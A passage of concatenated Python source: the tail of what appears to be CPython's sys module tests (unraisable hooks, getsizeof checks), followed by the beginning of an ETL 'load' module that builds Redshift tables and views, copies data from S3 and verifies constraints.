self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('5P2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('13P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
if __name__ == "__main__":
unittest.main()
|
load.py
|
"""
This is the "load and transform" part of our ELT.
There are three options for accomplishing this:
(1) a "load" command will start building the data warehouse from scratch, usually, after backing up.
(2) an "upgrade" command will try to load new data and changed relations (without any back up).
(3) an "update" command will attempt to bring in new data and new relations, then let it percolate.
The "load" command is used in the rebuild pipeline. It is important to notice that
it always operates on all tables in any schemas impacted by the load.
The "update" command is used in the refresh pipeline. It is safe to run (and safe to
re-run) to bring in new data. It cannot be used to make a structural change. Basically,
"update" will respect the boundaries set by "publishing" the data warehouse state in S3
as "current".
The "upgrade" command should probably be used only during development. Think of an "upgrade" as a
"load" without the safety net. Unlike "load", it will upgrade more surgically and not expand
to modify entire schemas, but unlike "update" it will not go gently about it.
(It is a bit expensive still given the cautious build up and permission changes.)
It is possible to bring up an "empty" data warehouse where all the structure exists
(meaning all the tables and views are in place) but no data was actually loaded.
This is used during the validation pipeline. See the "skip copy" options.
These are the general pre-requisites:
* "Tables" that have upstream sources must have data files and a manifest file from a prior
extract.
* "CTAS" tables are derived from queries so must have a SQL file.
* For every derived table (CTAS) a SQL file must exist in S3 with a valid
expression to create the content of the table (meaning: just the select without
closing ';'). The actual DDL statement (CREATE TABLE AS ...) and the table
attributes / constraints are added from the matching table design file.
* "VIEWS" are views and so must have a SQL file in S3.
Currently data files that are CSV, Avro or JSON-formatted are supported.
"""
import concurrent.futures
import logging
import queue
import re
import threading
import time
from calendar import timegm
from collections import defaultdict
from contextlib import closing
from datetime import datetime, timedelta
from functools import partial
from typing import Any, Dict, List, Optional, Sequence, Set
import funcy
from psycopg2.extensions import connection # only for type annotation
import etl
import etl.data_warehouse
import etl.db
import etl.dialect.redshift
import etl.monitor
import etl.relation
from etl.config.dw import DataWarehouseSchema
from etl.errors import (
ETLRuntimeError,
FailedConstraintError,
MissingExtractEventError,
MissingManifestError,
RelationConstructionError,
RelationDataError,
RequiredRelationLoadError,
UpdateTableError,
)
from etl.names import TableName, TableSelector, TempTableName
from etl.relation import RelationDescription
from etl.text import format_lines, join_with_double_quotes, join_with_single_quotes
from etl.util.retry import call_with_retry
from etl.util.timer import Timer
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
# --- Section 0: Foundation: LoadableRelation
class LoadableRelation:
"""
Wrapper for RelationDescription that adds state machinery useful for loading.
Loading here refers to the step in the ETL, so includes the load, upgrade, and update commands.
We use composition here to avoid copying from the RelationDescription.
Also, inheritance would work less well given how lazy loading is used in RelationDescription.
You're welcome.
Being 'Loadable' means that load-relevant RelationDescription properties may get new values
here. In particular:
- target_table_name is 'use_staging' aware
- query_stmt is 'use_staging' aware
However, dependency graph properties of RelationDescription should _not_ differ.
In particular:
- identifier should be consistent
- dependencies should be consistent
Q: Why 'loadable'?
A: Because 'LoadOrUpgradeOrUpdateInProgress' sounded less supercalifragilisticexpialidocious.
"""
def __getattr__(self, name):
"""Grab everything from the contained relation. Fail if it's actually not available."""
if hasattr(self._relation_description, name):
return getattr(self._relation_description, name)
raise AttributeError(f"'{self.__class__.__name__}' object has no attribute '{name}'")
def __str__(self) -> str:
return str(self.target_table_name)
def __format__(self, code):
r"""
Format target table as delimited identifier (with quotes) or just as an identifier.
With the default or ':s', it's a delimited identifier with quotes.
With ':x", the name is left bare but single quotes are around it.
Compared to RelationDescription, we have the additional complexity of dealing with
the position (staging or not) of a table.
>>> import etl.file_sets
>>> import etl.config
>>> from collections import namedtuple
>>> MockDWConfig = namedtuple('MockDWConfig', ['schemas'])
>>> MockSchema = namedtuple('MockSchema', ['name'])
>>> etl.config._dw_config = MockDWConfig(schemas=[MockSchema(name='c')])
>>> fs = etl.file_sets.RelationFileSet(TableName("a", "b"), TableName("c", "b"), None)
>>> relation = LoadableRelation(RelationDescription(fs), {}, skip_copy=True)
>>> "As delimited identifier: {:s}, as string: {:x}".format(relation, relation)
'As delimited identifier: "c"."b", as string: \'c.b\''
>>> relation_with_staging = LoadableRelation(
... RelationDescription(fs), {}, use_staging=True, skip_copy=True)
>>> "As delimited identifier: {:s}, as string: {:x}".format(
... relation_with_staging, relation_with_staging)
'As delimited identifier: "etl_staging$c"."b", as string: \'c.b\' (in staging)'
"""
if (not code) or (code == "s"):
return str(self)
if code == "x":
if self.use_staging:
return "'{:s}' (in staging)".format(self.identifier)
return "'{:s}'".format(self.identifier)
raise ValueError("unsupported format code '{}' passed to LoadableRelation".format(code))
def __init__(
self,
relation: RelationDescription,
info: dict,
use_staging=False,
target_schema: Optional[str] = None,
skip_copy=False,
in_transaction=False,
) -> None:
self._relation_description = relation
self.info = info
self.in_transaction = in_transaction
self.skip_copy = skip_copy
self.use_staging = use_staging
self.failed = False
if target_schema is not None:
self.target_table_name = TableName(
target_schema, self._relation_description.target_table_name.table
)
elif self.use_staging:
self.target_table_name = self._relation_description.target_table_name.as_staging_table_name()
else:
self.target_table_name = self._relation_description.target_table_name
def monitor(self):
return etl.monitor.Monitor(**self.info)
@property
def identifier(self) -> str:
# Load context should not change the identifier for logging.
if self.use_staging:
return self._relation_description.identifier
return self.target_table_name.identifier
def find_dependents(self, relations: Sequence["LoadableRelation"]) -> List["LoadableRelation"]:
unpacked = [
r._relation_description for r in relations
] # do DAG operations in terms of RelationDescriptions
dependent_relations = etl.relation.find_dependents(unpacked, [self._relation_description])
dependent_relation_identifiers = {r.identifier for r in dependent_relations}
return [
loadable for loadable in relations if loadable.identifier in dependent_relation_identifiers
]
def mark_failure(self, relations: Sequence["LoadableRelation"], exc_info=True) -> None:
"""Mark this relation as failed and set dependents (stored in :relations) to skip_copy."""
self.failed = True
if self.is_required:
logger.error("Failed to build required relation '%s':", self.identifier, exc_info=exc_info)
else:
logger.warning("Failed to build relation '%s':", self.identifier, exc_info=exc_info)
# Skip copy on all dependents
dependents = self.find_dependents(relations)
for dep in dependents:
dep.skip_copy = True
identifiers = [dependent.identifier for dependent in dependents]
if identifiers:
logger.warning(
"Continuing while leaving %d relation(s) empty: %s",
len(identifiers),
join_with_single_quotes(identifiers),
)
@property
def query_stmt(self) -> str:
stmt = self._relation_description.query_stmt
if self.use_staging:
# Rewrite the query to use staging schemas by changing identifiers to their staging
# version. This requires all tables to be fully qualified. There is a small chance
# that we're too aggressive and change a table name inside a string.
for dependency in self.dependencies:
staging_dependency = dependency.as_staging_table_name()
stmt = re.sub(dependency.identifier_as_re, staging_dependency.identifier, stmt)
return stmt
@property
def table_design(self) -> Dict[str, Any]:
design = self._relation_description.table_design
if self.use_staging:
# Rewrite foreign table references to point into the correct table
for column in design["columns"]:
if "references" in column:
[foreign_table, [foreign_column]] = column["references"]
column["references"] = [
TableName.from_identifier(foreign_table).as_staging_table_name().identifier,
[foreign_column],
]
return design
@classmethod
def from_descriptions(
cls,
relations: Sequence[RelationDescription],
command: str,
use_staging=False,
target_schema: Optional[str] = None,
skip_copy=False,
skip_loading_sources=False,
in_transaction=False,
) -> List["LoadableRelation"]:
"""Build a list of "loadable" relations."""
dsn_etl = etl.config.get_dw_config().dsn_etl
database = dsn_etl["database"]
base_index = {"name": database, "current": 0, "final": len(relations)}
base_destination = {"name": database}
managed = frozenset(relation.identifier for relation in relations)
loadable = []
for i, relation in enumerate(relations):
this_skip_copy = skip_copy
if skip_loading_sources:
# Only load transformations and only if no dependency is external.
if not relation.is_transformation or any(
dependency.identifier not in managed for dependency in relation.dependencies
):
this_skip_copy = True
target = relation.target_table_name
source = {"bucket_name": relation.bucket_name}
if relation.is_transformation:
source["object_key"] = relation.sql_file_name
else:
source["object_key"] = relation.manifest_file_name
destination = dict(base_destination, schema=target.schema, table=target.table)
monitor_info = {
"target": target.identifier,
"step": command,
"source": source,
"destination": destination,
"options": {"use_staging": use_staging, "skip_copy": this_skip_copy},
"index": dict(base_index, current=i + 1),
}
loadable.append(
cls(relation, monitor_info, use_staging, target_schema, this_skip_copy, in_transaction)
)
return loadable
# --- Section 1: Functions that work on relations (creating them, filling them, adding permissions)
def create_table(
conn: connection, relation: LoadableRelation, table_name: Optional[TableName] = None, dry_run=False
) -> None:
"""
Create a table matching this design (but possibly under another name).
If a name is specified, we'll assume that this should be an intermediate, aka temp table.
Columns must have a name and a SQL type (compatible with Redshift).
They may have an attribute of the compression encoding and the nullable constraint.
Other column attributes and constraints should be resolved as table
attributes (e.g. distkey) and table constraints (e.g. primary key).
Tables may have attributes such as a distribution style and sort key.
Depending on the distribution style, they may also have a distribution key.
"""
if table_name is None:
ddl_table_name = relation.target_table_name
message = "Creating table {:x}".format(relation)
is_temp = False
else:
ddl_table_name = table_name
message = "Creating temporary table for {:x}".format(relation)
is_temp = True
ddl_stmt = etl.dialect.redshift.build_table_ddl(
ddl_table_name, relation.table_design, is_temp=is_temp
)
etl.db.run(conn, message, ddl_stmt, dry_run=dry_run)
def create_view(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""Create VIEW using the relation's query."""
ddl_view_name = relation.target_table_name
stmt = etl.dialect.redshift.build_view_ddl(
ddl_view_name, relation.unquoted_columns, relation.query_stmt
)
etl.db.run(conn, "Creating view {:x}".format(relation), stmt, dry_run=dry_run)
def drop_relation_if_exists(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Run either DROP VIEW or DROP TABLE depending on type of existing relation.
It's ok if the relation doesn't already exist.
"""
try:
kind = etl.db.relation_kind(
conn, relation.target_table_name.schema, relation.target_table_name.table
)
if kind is not None:
stmt = """DROP {} {} CASCADE""".format(kind, relation)
etl.db.run(conn, "Dropping {} {:x}".format(kind.lower(), relation), stmt, dry_run=dry_run)
except Exception as exc:
raise RelationConstructionError(exc) from exc
def create_or_replace_relation(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Create fresh VIEW or TABLE and grant groups access permissions.
Note that we cannot use CREATE OR REPLACE statements since we want to allow going back and forth
between VIEW and TABLE (or in table design terms: VIEW and CTAS).
"""
try:
drop_relation_if_exists(conn, relation, dry_run=dry_run)
if relation.is_view_relation:
create_view(conn, relation, dry_run=dry_run)
else:
create_table(conn, relation, dry_run=dry_run)
grant_access(conn, relation, dry_run=dry_run)
except Exception as exc:
raise RelationConstructionError(exc) from exc
def grant_access(conn: connection, relation: LoadableRelation, dry_run=False):
"""
Grant privileges on (new) relation based on configuration.
We always grant all privileges to the ETL user. We may grant read-only access
or read-write access based on configuration. Note that the access is always based on groups,
not users.
"""
target = relation.target_table_name
schema_config = relation.schema_config
reader_groups, writer_groups = schema_config.reader_groups, schema_config.writer_groups
if reader_groups:
if dry_run:
logger.info(
"Dry-run: Skipping granting of select access on {:x} to {}".format(
relation, join_with_single_quotes(reader_groups)
)
)
else:
logger.info(
"Granting select access on {:x} to {}".format(
relation, join_with_single_quotes(reader_groups)
)
)
for reader in reader_groups:
etl.db.grant_select(conn, target.schema, target.table, reader)
if writer_groups:
if dry_run:
logger.info(
"Dry-run: Skipping granting of write access on {:x} to {}".format(
relation, join_with_single_quotes(writer_groups)
)
)
else:
logger.info(
"Granting write access on {:x} to {}".format(
relation, join_with_single_quotes(writer_groups)
)
)
for writer in writer_groups:
etl.db.grant_select_and_write(conn, target.schema, target.table, writer)
def delete_whole_table(conn: connection, table: LoadableRelation, dry_run=False) -> None:
"""Delete all rows from this table."""
stmt = """DELETE FROM {}""".format(table)
etl.db.run(conn, "Deleting all rows in table {:x}".format(table), stmt, dry_run=dry_run)
def copy_data(conn: connection, relation: LoadableRelation, dry_run=False):
"""
Load data into table in the data warehouse using the COPY command.
A manifest for the CSV files must be provided -- it is an error if the manifest is missing.
"""
aws_iam_role = str(etl.config.get_config_value("object_store.iam_role"))
s3_uri = "s3://{}/{}".format(relation.bucket_name, relation.manifest_file_name)
if not relation.has_manifest:
if dry_run:
logger.info(
"Dry-run: Ignoring that relation '{}' is missing manifest file '{}'".format(
relation.identifier, s3_uri
)
)
else:
raise MissingManifestError(
"relation '{}' is missing manifest file '{}'".format(relation.identifier, s3_uri)
)
copy_func = partial(
etl.dialect.redshift.copy_from_uri,
conn,
relation.target_table_name,
relation.unquoted_columns,
s3_uri,
aws_iam_role,
data_format=relation.schema_config.s3_data_format.format,
format_option=relation.schema_config.s3_data_format.format_option,
file_compression=relation.schema_config.s3_data_format.compression,
dry_run=dry_run,
)
if relation.in_transaction:
copy_func()
else:
call_with_retry(etl.config.get_config_int("arthur_settings.copy_data_retries"), copy_func)
def insert_from_query(
conn: connection,
relation: LoadableRelation,
table_name: Optional[TableName] = None,
columns: Optional[Sequence[str]] = None,
query_stmt: Optional[str] = None,
dry_run=False,
) -> None:
"""
Load data into table from its query (aka materializing a view).
The table name, query, and columns may be overridden from their defaults, which are the
values from the relation.
"""
if table_name is None:
table_name = relation.target_table_name
if columns is None:
columns = relation.unquoted_columns
if query_stmt is None:
query_stmt = relation.query_stmt
insert_func = partial(
etl.dialect.redshift.insert_from_query, conn, table_name, columns, query_stmt, dry_run=dry_run
)
if relation.in_transaction:
insert_func()
else:
call_with_retry(etl.config.get_config_int("arthur_settings.insert_data_retries"), insert_func)
def load_ctas_directly(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Run query to fill CTAS relation.
Not to be used for dimensions etc.)
"""
insert_from_query(conn, relation, dry_run=dry_run)
def create_missing_dimension_row(columns: Sequence[dict]) -> List[str]:
"""Return row that represents missing dimension values."""
na_values_row = []
for column in columns:
if column.get("skipped", False):
continue
elif column.get("identity", False):
na_values_row.append("0")
else:
if not column.get("not_null", False):
# Use NULL for any nullable column and use type cast (for UNION ALL to succeed)
na_values_row.append("NULL::{}".format(column["sql_type"]))
elif "timestamp" in column["sql_type"]:
na_values_row.append("'0000-01-01 00:00:00'")
elif "boolean" in column["type"]:
na_values_row.append("false")
elif "string" in column["type"]:
na_values_row.append("'N/A'")
else:
na_values_row.append("0")
return na_values_row
def load_ctas_using_temp_table(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""Run query to fill temp table and copy data (option: with missing dimension) into target."""
temp_name = TempTableName.for_table(relation.target_table_name)
create_table(conn, relation, table_name=temp_name, dry_run=dry_run)
try:
temp_columns = [
column["name"]
for column in relation.table_design["columns"]
if not (column.get("skipped") or column.get("identity"))
]
insert_from_query(conn, relation, table_name=temp_name, columns=temp_columns, dry_run=dry_run)
inner_stmt = "SELECT {} FROM {}".format(
join_with_double_quotes(relation.unquoted_columns), temp_name
)
if relation.target_table_name.table.startswith("dim_"):
missing_dimension = create_missing_dimension_row(relation.table_design["columns"])
inner_stmt += "\nUNION ALL SELECT {}".format(", ".join(missing_dimension))
insert_from_query(conn, relation, query_stmt=inner_stmt, dry_run=dry_run)
finally:
stmt = "DROP TABLE {}".format(temp_name)
etl.db.run(conn, "Dropping temporary table for {:x}".format(relation), stmt, dry_run=dry_run)
def analyze(conn: connection, table: LoadableRelation, dry_run=False) -> None:
"""Update table statistics."""
etl.db.run(
conn,
"Running analyze step on table {:x}".format(table),
"ANALYZE {}".format(table),
dry_run=dry_run,
)
def verify_constraints(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Raise a FailedConstraintError if :relation's target table doesn't obey its declared constraints.
Note that NULL in SQL is never equal to another value. This means for unique constraints that
rows where (at least) one column is null are not equal even if they have the same values in the
not-null columns. See description of unique index in the PostgreSQL documentation:
https://www.postgresql.org/docs/8.1/static/indexes-unique.html
For constraints that check "key" values (like 'primary_key'), this warning does not apply since
the columns must be not null anyways.
> "Note that a unique constraint does not, by itself, provide a unique identifier because it
> does not exclude null values."
https://www.postgresql.org/docs/8.1/static/ddl-constraints.html
"""
constraints = relation.table_design.get("constraints")
if constraints is None:
logger.info("No constraints to verify for '{:s}'".format(relation.identifier))
return
# To make this work in DataGrip, define '\{(\w+)\}' under Tools -> Database -> User Parameters.
# Then execute the SQL using command-enter, enter the values for `cols` and `table`, et voilà!
statement_template = """
SELECT DISTINCT
{columns}
FROM {table_}
WHERE {condition}
GROUP BY {columns}
HAVING COUNT(*) > 1
LIMIT {limit_}
"""
limit = 5 # arbitrarily chosen limit of examples to show
for constraint in constraints:
[[constraint_type, columns]] = constraint.items() # There will always be exactly one item.
quoted_columns = join_with_double_quotes(columns)
if constraint_type == "unique":
condition = " AND ".join('"{}" IS NOT NULL'.format(name) for name in columns)
else:
condition = "TRUE"
statement = statement_template.format(
columns=quoted_columns, table_=relation, condition=condition, limit_=limit
)
if dry_run:
logger.info(
"Dry-run: Skipping check of {} constraint in {:x} on column(s): {}".format(
constraint_type, relation, join_with_single_quotes(columns)
)
)
etl.db.skip_query(conn, statement)
else:
logger.info(
"Checking {} constraint in {:x} on column(s): {}".format(
constraint_type, relation, join_with_single_quotes(columns)
)
)
results = etl.db.query(conn, statement)
if results:
if len(results) == limit:
logger.error(
"Constraint check for {:x} failed on at least {:d} row(s)".format(
relation, len(results)
)
)
else:
logger.error(
"Constraint check for {:x} failed on {:d} row(s)".format(relation, len(results))
)
raise FailedConstraintError(relation, constraint_type, columns, results)
# --- Section 2: Functions that work on schemas
def find_traversed_schemas(relations: Sequence[LoadableRelation]) -> List[DataWarehouseSchema]:
"""Return schemas traversed when refreshing relations (in order that they are needed)."""
got_it: Set[str] = set()
traversed_in_order = []
for relation in relations:
this_schema = relation.schema_config
if this_schema.name not in got_it:
got_it.add(this_schema.name)
traversed_in_order.append(this_schema)
return traversed_in_order
def create_schemas_for_rebuild(
schemas: Sequence[DataWarehouseSchema], use_staging: bool, dry_run=False
